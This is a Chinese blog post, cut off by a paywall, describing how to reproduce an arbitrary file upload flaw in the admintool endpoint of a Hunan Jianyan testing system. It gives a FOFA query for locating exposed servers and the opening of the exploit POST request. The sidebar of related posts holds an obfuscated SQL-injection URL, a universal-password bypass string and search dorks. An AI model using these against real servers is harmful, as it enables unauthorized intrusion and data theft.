【漏洞复现】某检测系统(admintool)接口任意文件上传漏洞

于 2023-12-27 21:44:13 发布
阅读量640 收藏 9
点赞数 8
分类专栏: 漏洞复现 文章标签: Web漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46944519/article/details/135256404
版权

文章目录

前言

湖南建研检测系统 admintool接口任意文件上传漏洞,攻击者可通过该漏洞获取服务器敏感信息。

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞详情

本检测信息管理系统能够实现检验工作的计算机化和网络化管理,基本实现检测数据的自动采集 确保检验数据的公正性、科学性和准确性,确保检验报告的规范性和权威性,确保检验工作的高效率和服务的及时性, admintool 接口存在任意文件上传漏洞。

二、影响版本

湖南建研-检测系统

在这里插入图片描述

三、漏洞复现

FOFA: body="/Content/Theme/Standard/webSite/login.css"

上传文件数据包

POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: ip:host
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, lik
了解本专栏 订阅专栏 解锁全文 超级会员免费看
李火火安全阁
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
文件上传漏洞-解析漏洞CMS漏洞、编辑器漏洞、CVE等漏洞
硫酸超的博客
08-12 556
演示案例 CVE-2017-12615-上传-Tomcat 中间件解析漏洞+配合文件上传测试 IIS-上传-解析-(panfei806) 修改filepath的值为/1 路径就会变成 /12001001.jpg 那么如果将filepath的值改为 /1.php; 那么路径就会变成/1.php;12001001.jpg被当做php文件执行 效果: Apache-上传-解析-vulhub Nginx-上传-解析-vulhub ...
0day漏洞(aspcms漏洞实战
weixin_49071539的博客
12-16 3447
1. 谷歌搜索关键字 Powered by aspcms.com Copyright ?2010-2011 intitle:Powered by AspCms2 2. 接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 3.
CMS指纹字典大全
热门推荐
没有
02-22 4万+
CMS识别是依靠特殊的文件,所以识别字典是非常重要的
CTF--CMS漏洞总结
woshisz0413的博客
11-27 1万+
CMS漏洞总结 CMS类型题目: 首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入; 或者上传一句话木马后使用菜刀连接,可能再连接数据库。 (1)CMSEASY类型 可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy 1.cmseasy 无限制报错注入 步骤:向http://*****/cel...
CMS漏洞复现
qq_44832048的博客
07-19 9806
dedeCMS (CNVD-2018-01221) 类型: php类cms系统:dedecms、帝国cms、php168、phpcmscmstop、discuz、phpwind等asp类cms系统:zblog、KingCMS等国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。 dedeCMS (CNVD-2018-01221) 漏洞简介...
安全开发Python网页OA系统POC漏洞检测系统,框架FLask + python + OAPOC payload
07-19
Python网页OA系统POC漏洞检测系统 框架FLask + python + OAPOC payload 角色介绍 管理员 admin 123456 模块介绍 登录模块 首页模块 OA安全检测子模块(支持多个url或者单个url检测,调用payload并在界面回馈检测...
wordpress 评论插件 wpDiscuz 任意文件上传漏洞分析1
08-03
【WordPress wpDiscuz 评论插件任意文件上传漏洞分析】 WordPress 是一款广泛使用的开源内容管理系统,而 wpDiscuz 是一个流行的评论插件,它为 WordPress 网站提供了丰富的交互式评论功能。然而,如同任何软件一样...
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
### eyoucms V1.0.4 后台任意文件读取漏洞详解 #### 漏洞背景 易优CMS(eyoucms)是一款基于PHP+MySQL开发的企业级建站系统,广泛应用于中小企业的网站搭建。它支持多平台访问,包括PC端、移动端以及微信平台。...
智睿管理系统修改管理任意密码漏洞后门
09-28
然而,根据描述,智睿管理系统Admin_Passod.asp文件中存在这样的漏洞,该文件可能负责处理密码更改请求。由于缺少登录验证,攻击者无需拥有有效的登录凭据就能访问并修改管理密码。 “后门”是另一个关键术语,它...
CLTPHP_v5.5.3 前台任意文件上传漏洞.pdf
04-22
### CLTPHP_v5.5.3 前台任意文件上传漏洞分析及修复 #### 一、环境准备与背景介绍 CLTPHP是一款广泛应用于网站建设的内容管理系统,因其丰富的功能和简便的操作流程受到众多开发者的青睐。然而,在其5.5.3版本中...
CMS漏洞总结
include_voidmain的博客
08-01 4745
CMS漏洞总结
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
xinyue9966的博客
02-18 7533
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
记某CMS漏洞getshell
zhangge3663的博客
05-05 2819
记极致CMS漏洞getshell 今天下午比较空闲,就去搜索一些cms,突然对极致CMS感兴趣,而网上已经有一些文章对它进行分析利用,sql注入,xss,后台修改上传后缀名前台getshell等等。 于是就引起了我的兴趣想去测试一下。 信息收集 还是因为自己太懒,不想搭建环境,然后就想网上有好多网站啊,随便找一个去看看。hhh然后去利用fofa去搜索。(不能随便乱日) 弱密码yyds 搜索了一些网站,我们直接在url后面添加/admin.php,就直接跳到后台登录的地方。 看到后台?!嗯
一些CMS网站系统漏洞,练手用(持续更新)
dibodang1423的博客
04-30 928
仅供拿shell,提权测试用,请勿恶意破坏 XuSoft系统: 后台万能密码:'or'='or' 可直接登陆,后台地址/manage/login.asp inurl:ReadArticlemb.asp?id= inurl:ReadBigClassmb.asp?id= inurl:ReadBigClassmbNews.asp?id= UPUPW绿色服务器平...
聚类算法-一种无监督学习方法.docx
最新发布
08-12
聚类算法是一种无监督学习方法,用于将数据集中的数据点自动分组到不同的类别中,这些类别也称为“簇”或“群”。聚类的目标是让同一簇内的数据点尽可能相似,而不同簇之间的数据点尽可能不相似。聚类算法广泛应用于多种领域,如数据挖掘、模式识别、图像分析、信息检索等。 聚类算法的基本概念 无监督学习:聚类算法不需要事先标记数据点的类别标签,而是根据数据本身的相似性来分组。 相似性度量:聚类算法依赖于某种相似性或距离度量来决定数据点之间的相似程度。常用的度量包括欧氏距离、曼哈顿距离等。 目标函数:大多数聚类算法都会尝试最小化某种目标函数,例如簇内的平方误差和(SSE)。 常见的聚类算法 K-Means K-Means 是一种原型聚类算法,它通过迭代地将数据点分配到最近的质心来形成簇,并重新计算每个簇的质心,直到质心不再显著变化为止。 在 Python 的 scikit-learn 库中,可以通过 KMeans 类实现 K-Means 聚类。 层次聚类 层次聚类构建一个树状图(称为树状图或 dendrogram),显示数据点是如何逐渐合并成簇的。 这种算法可以是凝聚型(自底向上)或分裂型(自顶向下)。
45ft集装箱模型3D图纸 STEP格式.zip
08-12
45ft集装箱模型3D图纸 STEP格式.zip
Spring Boot网吧管理系统.zip
08-12
系统严格按照需求分析制作相关模块,并利用所学知识尽力完成,但是本人由于学识浅薄,无法真正做到让该程序可以投入市场使用,仅仅简单实现部分功能,希望日后还能改善。 本系统具有以下优点: 该系统具有较高的适用性,选用B/S结构,可以在绝大部分个人平台上使用该系统系统将用户权限进行划分,管理员,网管和会员都能看到及操作的信息不一样,三者具备不同的操作权限。 该系统操作界面简单明了,大部分人都可以正常使用。 但也存在以下问题需要改进: 运行时窗口不能被刷新,可以改进。 系统过于简单,显示的信息有限。。 不能添加多个管理员账号,如果可以则将利于发展网吧规模,便于网吧信息集中管理。 不能实时预约接待消息和网吧反馈建议,容易被忽视,不利于管理员服务客户。
微信小程序大作业 新闻小程序
08-12
微信小程序大作业 新闻小程序
tomcat弱口令登入后台漏洞复现
07-13
Tomcat弱口令漏洞通常指的是服务器未正确配置导致管理员账户使用了默认或过于简单的密码,容易被攻击者利用来进行未经授权的访问。复现这种漏洞通常需要以下步骤: 1. **查找漏洞信息**:首先确认该Tomcat版本是否存在已知的弱口令漏洞,这通常可以在安全公告、官方文档或漏洞数据库(如CVE)中找到。 2. **目标环境设置**:确定你的目标Tomcat服务器的IP地址、端口号以及默认管理界面路径(通常是`http://<ip>:8080/manager/html`),同时检查用户名和密码是否可以用默认值(如admin或空白)尝试登录。 3. **尝试登录**:使用工具(如burp suite、nmap等)或直接浏览器输入上述信息进行登录,如果使用的是默认或弱密码,可能会成功登录。 4. **验证漏洞**:登录后查看权限,如能够修改配置文件或管理系统,就说明可能存在弱口令漏洞。 5. **修复措施**:一旦确认漏洞存在,应立即更改管理员密码,并确保设置复杂的密码策略,禁用默认用户,或者安装安全补丁以防止此类漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值